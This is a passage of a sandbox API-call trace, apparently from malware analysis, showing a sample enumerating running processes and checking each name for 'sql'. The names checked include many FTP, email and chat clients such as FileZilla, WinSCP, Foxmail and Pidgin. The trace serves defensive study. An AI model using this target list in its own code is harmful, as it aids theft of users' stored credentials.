lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.914] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583668 [0140.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3583668, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0140.915] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0140.915] StrStrIA (lpFirst="alftp.exe", lpSrch="sql") returned 0x0 [0140.915] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0141.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.465] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583830 [0141.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3583830, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0141.466] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0141.466] StrStrIA (lpFirst="barca.exe", lpSrch="sql") returned 0x0 [0141.466] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0141.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.467] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583848 [0141.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3583848, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0141.467] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0141.467] StrStrIA (lpFirst="bitkinex.exe", lpSrch="sql") returned 0x0 [0141.467] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0141.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.468] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35835f0 [0141.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35835f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0141.469] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0141.469] StrStrIA (lpFirst="coreftp.exe", lpSrch="sql") returned 0x0 [0141.469] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0141.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.470] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e3c8 [0141.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e3c8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0141.470] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0141.470] StrStrIA (lpFirst="far.exe", lpSrch="sql") returned 0x0 [0141.470] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0141.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0141.471] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583860 [0141.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3583860, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0141.471] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0141.472] StrStrIA (lpFirst="filezilla.exe", lpSrch="sql") returned 0x0 [0141.472] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0141.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.473] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35836c8 [0141.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x35836c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0141.473] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0141.473] StrStrIA (lpFirst="flashfxp.exe", lpSrch="sql") returned 0x0 [0141.473] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0141.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.474] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35836f8 [0141.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x35836f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0141.475] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0141.475] StrStrIA (lpFirst="fling.exe", lpSrch="sql") returned 0x0 [0141.475] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0141.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0141.476] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35966e8 [0141.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x35966e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0141.476] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0141.476] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="sql") returned 0x0 [0141.476] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0141.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0141.477] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596948 [0141.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3596948, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0141.478] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0141.478] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="sql") returned 0x0 [0141.478] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0141.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.479] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e448 [0141.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e448, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0141.479] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0141.479] StrStrIA (lpFirst="icq.exe", lpSrch="sql") returned 0x0 [0141.479] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0141.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.481] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583680 [0141.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3583680, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0141.481] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0141.481] StrStrIA (lpFirst="leechftp.exe", lpSrch="sql") returned 0x0 [0141.481] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0141.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.482] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583608 [0141.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3583608, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0141.482] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0141.482] StrStrIA (lpFirst="ncftp.exe", lpSrch="sql") returned 0x0 [0141.482] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0141.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.483] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35836e0 [0141.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x35836e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0141.484] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0141.484] StrStrIA (lpFirst="notepad.exe", lpSrch="sql") returned 0x0 [0141.484] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0141.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0141.485] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583728 [0141.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3583728, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0141.485] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0141.485] StrStrIA (lpFirst="operamail.exe", lpSrch="sql") returned 0x0 [0141.485] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0141.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.486] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583878 [0141.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3583878, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0141.486] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0141.487] StrStrIA (lpFirst="pidgin.exe", lpSrch="sql") returned 0x0 [0141.487] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0141.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0141.488] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583740 [0141.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3583740, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0141.488] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0141.488] StrStrIA (lpFirst="scriptftp.exe", lpSrch="sql") returned 0x0 [0141.488] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0141.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.489] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583770 [0141.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3583770, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0141.490] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0141.490] StrStrIA (lpFirst="skype.exe", lpSrch="sql") returned 0x0 [0141.490] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0141.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.491] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583890 [0141.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3583890, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0141.491] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0141.491] StrStrIA (lpFirst="smartftp.exe", lpSrch="sql") returned 0x0 [0141.491] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0141.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.493] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583620 [0141.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3583620, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0141.493] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0141.493] StrStrIA (lpFirst="totalcmd.exe", lpSrch="sql") returned 0x0 [0141.493] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0141.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.672] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35835c0 [0141.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x35835c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0141.672] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0141.672] StrStrIA (lpFirst="trillian.exe", lpSrch="sql") returned 0x0 [0141.673] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0141.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.674] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35833e0 [0141.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x35833e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0141.674] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0141.674] StrStrIA (lpFirst="webdrive.exe", lpSrch="sql") returned 0x0 [0141.674] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0141.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.675] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583428 [0141.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3583428, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0141.676] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0141.676] StrStrIA (lpFirst="whatsapp.exe", lpSrch="sql") returned 0x0 [0141.676] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0141.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.677] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583500 [0141.677] WideCharToMultiByte (in: CodePage=0x0, 